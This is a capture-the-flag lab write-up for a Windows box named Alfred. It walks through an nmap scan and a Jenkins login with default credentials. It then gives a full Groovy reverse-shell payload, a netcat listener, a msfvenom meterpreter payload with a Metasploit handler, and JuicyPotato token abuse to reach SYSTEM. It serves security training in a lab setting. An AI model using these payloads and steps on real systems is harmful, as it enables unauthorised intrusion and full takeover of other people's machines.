Alfred

Exploit Jenkins to gain an initial shell, then escalate your privileges by exploiting Windows authentication tokens.

Scanning

nmap

root@ip-10-10-77-178:~# nmap -A -T4 -O 10.10.126.34

Starting Nmap 7.60 ( https://nmap.org ) at 2021-09-21 16:30 BST
Nmap scan report for ip-10-10-126-34.eu-west-1.compute.internal (10.10.126.34)
Host is up (0.00046s latency).
Not shown: 997 filtered ports
PORT     STATE SERVICE    VERSION
80/tcp   open  http       Microsoft IIS httpd 7.5
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: Site doesn't have a title (text/html).
3389/tcp open  tcpwrapped
| ssl-cert: Subject: commonName=alfred
| Not valid before: 2021-09-20T15:27:46
|_Not valid after:  2022-03-22T15:27:46
8080/tcp open  http       Jetty 9.4.z-SNAPSHOT
| http-robots.txt: 1 disallowed entry 
|_/
|_http-server-header: Jetty(9.4.z-SNAPSHOT)
|_http-title: Site doesn't have a title (text/html;charset=utf-8).
MAC Address: 02:1A:CA:11:02:A3 (Unknown)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Microsoft Windows Server 2008 (90%), Microsoft Windows Server 2008 R2 (90%), Microsoft Windows Server 2008 R2 or Windows 8 (90%), Microsoft Windows 7 SP1 (90%), Microsoft Windows 8.1 Update 1 (90%), Microsoft Windows 8.1 R1 (90%), Microsoft Windows Phone 7.5 or 8.0 (90%), Microsoft Windows Server 2008 or 2008 Beta 3 (89%), Microsoft Windows Server 2008 R2 or Windows 8.1 (89%), Microsoft Windows Server 2008 R2 SP1 (89%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

TRACEROUTE
HOP RTT     ADDRESS
1   0.46 ms ip-10-10-126-34.eu-west-1.compute.internal (10.10.126.34)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 33.09 seconds

3 Ports open

Enumeration

Port 80

landing page after some enum no thing interesting except this mail alfred@wayneenterprises.com

Port 8080

Jenkins login page ... after some tries of default credentials admin:admin

Now we should find a way to execute reverse shell jenkins has this ability just copy me

Initial Access

payload

String host="localhost";
int port=8044;
String cmd="cmd.exe";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();

setup listener on attacker box nc -nlvvp 8044

run payload ...

Recommended Abusing Jenkins Groovy Script Console to get Shell

Privilege Escalation

we will use JuicyPotato

download executable

setup smb server on attacker box smbserver.py kali .

Download on victim machine C:\Users\bruce\Desktop>copy \10.10.77.178\kali\JuicyPotato.exe JuicyPotato.exe

we need to generate msf payload to gain reverse shell with system privilege

msfvenom -p windows/meterpreter/reverse_tcp -a x86 --encoder x86/shikata_ga_nai LHOST=[IP] LPORT=1234 -f exe -o rev1234.exe

copy it to victim box in same way above

then setup handler for the above payload

use exploit/multi/handler set PAYLOAD windows/meterpreter/reverse_tcp set LHOST 10.10.77.178 set LPORT 1234 run

run C:\Users\bruce\Desktop>JuicyPotato.exe -t * -l 1234 -p C:\Users\bruce\Desktop\rev1234.exe

to read root flag migrate to higher process

PreviousBlueNextHackPark

Last updated